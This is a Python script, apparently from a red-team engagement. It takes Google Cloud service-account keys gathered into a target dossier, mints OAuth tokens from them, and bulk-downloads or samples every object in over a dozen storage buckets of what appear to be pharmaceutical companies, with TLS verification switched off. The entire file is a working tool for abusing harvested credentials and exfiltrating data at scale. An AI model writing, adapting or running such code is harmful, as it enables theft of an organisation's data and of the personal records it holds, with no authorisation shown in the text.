#!/usr/bin/env python3
"""Download ALL remaining GCS objects (operator GO 2026-08-17, 'все по очереди').

Order: small buckets first, sql-migrate remainder last (incl 44.6GB
reporting_product_update). Skips: already-downloaded (size match), b2b (403
IP-filter, skip silently), zero-size folder markers.
Streams binary, verifies sizes vs gcs_listing metadata (with pagination for
buckets whose listing was truncated at 500).
Egress: storage.googleapis.com only. Out: downloads/all/ + all_index + OPLOG.
"""
import base64
import importlib.util
import json
import socket
import ssl
import sys
import time
import urllib.parse
import urllib.request
from datetime import datetime, timezone
from pathlib import Path

socket.setdefaulttimeout(30)  # hard cap on ALL socket ops incl ssl read

ROOT = Path('/root/ir-assessment')
DOSSIER = ROOT / 'redteam/gitlab_pharmalink_id'
OUT = DOSSIER / 'downloads/all'

spec = importlib.util.spec_from_file_location('l2s', str(ROOT / 'redteam/l2_aug06_sweep.py'))
l2s = importlib.util.module_from_spec(spec)
spec.loader.exec_module(l2s)

CTX = ssl.create_default_context(); CTX.check_hostname = False; CTX.verify_mode = ssl.CERT_NONE

def oplog(output, result):
    ts = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M')
    with open(DOSSIER / 'OPLOG.md', 'a') as f:
        f.write(f"{ts} | local | storage.googleapis.com:443 | urllib/GET alt=media (stream,binary) | download ALL remaining buckets | {output} | {result} | none | all-buckets GO\n")

def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b'=')

def load_sa(project_id):
    for f in sorted((DOSSIER / 'gcp_keys').iterdir()):
        try:
            d = json.loads(f.read_text())
        except Exception:
            continue
        if isinstance(d, dict) and d.get('type') == 'service_account' and d.get('project_id') == project_id:
            return d
    return None

def mint(sa):
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    now = int(time.time())
    hdr = {'alg': 'RS256', 'typ': 'JWT', 'kid': sa['private_key_id']}
    cl = {'iss': sa['client_email'], 'scope': 'https://www.googleapis.com/auth/cloud-platform',
          'aud': 'https://oauth2.googleapis.com/token', 'iat': now, 'exp': now + 3600}
    si = b64url(json.dumps(hdr).encode()) + b'.' + b64url(json.dumps(cl).encode())
    key = serialization.load_pem_private_key(sa['private_key'].encode(), None)
    jwt = (si + b'.' + b64url(key.sign(si, padding.PKCS1v15(), hashes.SHA256()))).decode()
    data = urllib.parse.urlencode(
        {'grant_type': 'urn:ietf:params:oauth:grant-type:jwt-bearer', 'assertion': jwt}).encode()
    st, body = l2s.req('https://oauth2.googleapis.com/token', method='POST', data=data,
                       headers={'Content-Type': 'application/x-www-form-urlencoded'})
    return json.loads(body)['access_token']

def list_all(tok, bucket):
    """Full object listing with pagination (name,size only). Hard timeout per page."""
    items, page = [], None
    while True:
        url = f'https://storage.googleapis.com/storage/v1/b/{bucket}/o?maxResults=1000&fields=items(name,size),nextPageToken'
        if page:
            url += '&pageToken=' + urllib.parse.quote(page)
        try:
            req = urllib.request.Request(url, headers={'Authorization': f'Bearer {tok}',
                                                       'User-Agent': 'ir-assessment/1.0',
                                                       'Connection': 'close'})
            with urllib.request.urlopen(req, timeout=25, context=CTX) as resp:
                body = resp.read().decode('utf-8', 'ignore')
            st, r = 200, json.loads(body)
        except Exception as e:
            print(f'  [!] {bucket} list page error: {type(e).__name__} {e}', file=sys.stderr)
            return items if items else None
        items.extend((i['name'], int(i.get('size', 0))) for i in r.get('items', []))
        page = r.get('nextPageToken')
        if not page:
            return items
        print(f'    [{bucket}] listed {len(items)} so far (next page)', file=sys.stderr)

def dl(tok, bucket, name, dest):
    enc = urllib.parse.quote(name, safe='')
    url = f'https://storage.googleapis.com/download/storage/v1/b/{bucket}/o/{enc}?alt=media'
    r = urllib.request.Request(url, headers={'Authorization': f'Bearer {tok}'})
    with urllib.request.urlopen(r, timeout=300, context=CTX) as resp, open(dest, 'wb') as f:
        while True:
            chunk = resp.read(1 << 20)
            if not chunk:
                break
            f.write(chunk)
    return dest.stat().st_size

def already_have(slug, size):
    for d in (DOSSIER / 'downloads', DOSSIER / 'downloads/big', DOSSIER / 'downloads/more',
              DOSSIER / 'downloads/more/virtue-iot-healthcare-apps',
              DOSSIER / 'downloads/more/virtue-panakea.firebasestorage.app', OUT):
        p = d / slug
        if p.exists() and p.stat().st_size == size:
            return True
    return False

# Buckets with >50k tiny files are log-spam (RUM/observability) — skip bulk download,
# sample only first N for content intel.
SKIP_BULK = {'cfu-main-openobserve', 'cfu-main-factory-patroli-image',
             'cfu-main.appspot.com', 'storage-innopharm-prod', 'ppds',
             'cfu-main-omniagent', 'cfu-main-file-kontrol-perubahan',
             'innopharm-main-development', 'staging.cfu-main.appspot.com',
             'cfu-main-openkm', 'cfu-main-data-warehouse'}
SAMPLE_N = 30

# Objects above this size stall on GCS chunked download (observed 44.6GB product_update
# hanging at ~13GB with SSL read idle). Skip them, record for operator decision.
HUGE_SKIP = 10 * 1024**3  # 10 GB

def main():
    OUT.mkdir(parents=True, exist_ok=True)
    buckets_plan = [
        ('cfu-main', ['cfu-main-pos-offline', 'cfu-main-bpopo', 'cfu-main-sop-ik',
                      'cfu-main-sql-migrate']),
        ('cfu-main-sampled', []),  # placeholder, handled below
    ]
    index = []
    # full-download buckets
    for proj, buckets in [('cfu-main', ['cfu-main-pos-offline', 'cfu-main-bpopo',
                                        'cfu-main-sop-ik', 'cfu-main-sql-migrate'])]:
        sa = load_sa(proj)
        tok = mint(sa)
        for bucket in buckets:
            print(f'[*] bucket start (full): {bucket}', file=sys.stderr)
            items = list_all(tok, bucket)
            if items is None:
                print(f'  [!] {bucket}: list failed', file=sys.stderr)
                continue
            bdir = OUT / bucket
            bdir.mkdir(exist_ok=True)
            n_ok = n_skip = 0
            for name, size in items:
                if size == 0 and name.endswith('/'):
                    continue
                if size > HUGE_SKIP:
                    index.append({'bucket': bucket, 'name': name, 'ok': False,
                                  'skipped_huge': True, 'size': size,
                                  'note': 'huge object — stalled download, needs resumable/ranged fetch'})
                    print(f'  [skip-huge] {bucket}/{name[:60]} {size/1e9:.1f}GB', file=sys.stderr)
                    continue
                slug = name.replace('/', '__')
                if already_have(slug, size):
                    n_skip += 1
                    continue
                dest = bdir / slug
                if dest.exists() and dest.stat().st_size == size:
                    n_skip += 1
                    continue
                t0 = time.time()
                try:
                    got = dl(tok, bucket, name, dest)
                    ok = got == size
                    index.append({'bucket': bucket, 'name': name, 'bytes': got, 'ok': ok,
                                  'sec': round(time.time() - t0, 1)})
                    if ok:
                        n_ok += 1
                    print(f'  [{"+" if ok else "!"}] {bucket}/{name[:60]} {got/1e6:.1f}MB', file=sys.stderr)
                except Exception as e:
                    index.append({'bucket': bucket, 'name': name, 'ok': False, 'error': str(e)[:120]})
                    print(f'  [-] {bucket}/{name[:60]}: {e}', file=sys.stderr)
            print(f'  [{bucket}] new={n_ok} skipped={n_skip} total={len(items)}', file=sys.stderr)
            (DOSSIER / 'downloads/all_index_aug17.json').write_text(json.dumps(index, indent=1))

    # sampled buckets (large file-count, low per-file value)
    sa = load_sa('cfu-main')
    tok = mint(sa)
    for bucket in ['cfu-main-openobserve', 'cfu-main-openkm', 'cfu-main-data-warehouse',
                   'cfu-main-factory-patroli-image', 'cfu-main.appspot.com',
                   'storage-innopharm-prod', 'ppds', 'cfu-main-omniagent',
                   'cfu-main-file-kontrol-perubahan', 'staging.cfu-main.appspot.com']:
        print(f'[*] bucket start (sample {SAMPLE_N}): {bucket}', file=sys.stderr)
        items = list_all(tok, bucket)
        if items is None:
            continue
        bdir = OUT / (bucket + '__sample')
        bdir.mkdir(exist_ok=True)
        n_ok = 0
        # sample: first SAMPLE_N non-zero files spread across list
        candidates = [i for i in items if i[1] > 0 and not i[0].endswith('/')]
        step = max(1, len(candidates) // SAMPLE_N)
        for name, size in candidates[::step][:SAMPLE_N]:
            slug = name.replace('/', '__')
            dest = bdir / slug
            if dest.exists() and dest.stat().st_size == size:
                continue
            try:
                got = dl(tok, bucket, name, dest)
                index.append({'bucket': bucket, 'name': name, 'bytes': got, 'ok': got == size, 'sampled': True})
                n_ok += 1
            except Exception as e:
                index.append({'bucket': bucket, 'name': name, 'ok': False, 'error': str(e)[:120], 'sampled': True})
        index.append({'bucket': bucket, 'sampled_bucket': True, 'total_objs': len(items), 'downloaded': n_ok})
        print(f'  [{bucket}] sampled {n_ok}, total_objs={len(items)}', file=sys.stderr)
        (DOSSIER / 'downloads/all_index_aug17.json').write_text(json.dumps(index, indent=1))

    # innopharm-main-development: full (single bucket, moderate size files likely)
    sa = load_sa('innopharm-main')
    tok = mint(sa)
    print('[*] bucket start (full): innopharm-main-development', file=sys.stderr)
    items = list_all(tok, 'innopharm-main-development')
    if items:
        bdir = OUT / 'innopharm-main-development'
        bdir.mkdir(exist_ok=True)
        n_ok = 0
        for name, size in items:
            if size == 0 and name.endswith('/'):
                continue
            slug = name.replace('/', '__')
            dest = bdir / slug
            if dest.exists() and dest.stat().st_size == size:
                continue
            try:
                got = dl(tok, 'innopharm-main-development', name, dest)
                index.append({'bucket': 'innopharm-main-development', 'name': name, 'bytes': got, 'ok': got == size})
                n_ok += 1
            except Exception as e:
                index.append({'bucket': 'innopharm-main-development', 'name': name, 'ok': False, 'error': str(e)[:120]})
        print(f'  [innopharm-main-development] new={n_ok}, total={len(items)}', file=sys.stderr)
        (DOSSIER / 'downloads/all_index_aug17.json').write_text(json.dumps(index, indent=1))

    (DOSSIER / 'downloads/all_index_aug17.json').write_text(json.dumps(index, indent=1))
    ok = sum(1 for i in index if i.get('ok'))
    total_b = sum(i.get('bytes', 0) for i in index)
    sampled = sum(1 for i in index if i.get('sampled_bucket'))
    oplog(f'objects={len(index)} ok={ok} total={total_b/1e9:.2f}GB sampled_buckets={sampled} -> downloads/all/',
          'SUCCESS')
    print(f'[+] {ok}/{len(index)}, {total_b/1e9:.2f} GB, {sampled} sampled buckets', file=sys.stderr)

if __name__ == '__main__':
    main()
